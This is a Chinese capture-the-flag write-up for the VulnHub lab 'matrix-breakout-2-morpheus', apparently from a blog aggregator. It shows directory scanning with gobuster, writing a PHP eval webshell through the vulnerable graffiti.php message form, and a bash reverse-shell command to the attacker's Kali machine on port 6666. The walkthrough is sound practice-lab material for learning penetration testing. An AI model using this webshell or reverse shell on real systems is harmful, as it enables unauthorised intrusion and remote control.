当前位置: 首页 > news >正文

VulnHub-matrix-breakout-2-morpheus通关攻略

        一、信息收集

        第一步:确定靶机IP为192.168.0.106

        第二步:扫描后台及开放端口

        第三步:进行敏感目录及文件扫描

#敏感目录及文件
DIRECTORY: http://192.168.0.106/javascript/ 
DIRECTORY: http://192.168.0.106/javascript/jquery/ 

http://192.168.0.106/index.html (CODE:200|SIZE:348)                           
http://192.168.0.106/robots.txt (CODE:200|SIZE:47)                            
http://192.168.0.106/server-status (CODE:403|SIZE:278)  
http://192.168.0.106/javascript/jquery/jquery (CODE:200|SIZE:287600)        
        第四步:访问敏感文件与端口,寻找有用信息

        第五步:使用gobuster进一步扫描

#使用gobuster
gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

/graffiti.txt         (Status: 200) [Size: 139]
/graffiti.php         (Status: 200) [Size: 451]

        

        二、网站爆破

        第一步:访问http://192.168.0.106//graffiti.php并进行留言,发现会在graffiti.txt显示

        第二步:bp抓包,重新留言,尝试写入一句话木马

message=<?php eval(@$_POST[cmd]);?>&file=shell.php
        第三步:使用蚁剑连接,在根目录下找到flag

        第四步:反弹shell,在先Kali开启监听,再在蚁剑右键打开终端输入命令回车

#蚁剑 --- 此处为Kali的IP,反弹至6666端口
/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/6666 0>&1'

                                                                                                                        FROM  IYU_

相关文章:

  • 2025年人工智能、数字媒体技术与社会计算国际学术会议
  • Python字符串格式化全面指南:f-string与常用方法详解
  • pyqt 按钮自动布局方案
  • Hadoop•常用命令
  • LS-NET-006-思科MDS 9148S 查看内存
  • Python:多态,静态方法和类方法
  • golang 生成单元测试报告
  • 目标检测——清洗数据
  • Java 填充 PDF 模版
  • Python个人学习笔记(18):模块(异常处理、traceback、日志记录)
  • MAC-在使用@Async注解的方法时,分布式锁管理和释放
  • STM32原理性知识
  • 一种基于大规模语言模型LLM的数据分析洞察生成方法
  • 如何在 Node.js 中使用 .env 文件管理环境变量 ?
  • Rust嵌入式开发环境搭建指南(基于Stm32+Vscode)
  • ASP3605同步降压调节器——满足汽车电子严苛要求的电源芯片方案
  • 数学之握手问题
  • Java替换jar包中class文件
  • Matlab概率区间预测全家桶更新了,新增光伏出力区间预测,4种分布可供预测
  • 【单片机通信技术应用——学习笔记三】液晶屏显示技术,取模软件的应用
  • 上海国际咖啡文化节开幕,北外滩集结了超350个展位
  • 辽宁辽阳市白塔区一饭店火灾事故举行新闻发布会,现场为遇难者默哀
  • 锦江酒店:第一季度营业收入约29.42亿元,境内酒店出租率同比增长
  • 金砖国家外长会晤发表主席声明,强调南方国家合作
  • 中信银行一季度净利195.09亿增1.66%,不良率持平
  • 费高云调研党的建设工作:营造风清气正劲足的政治生态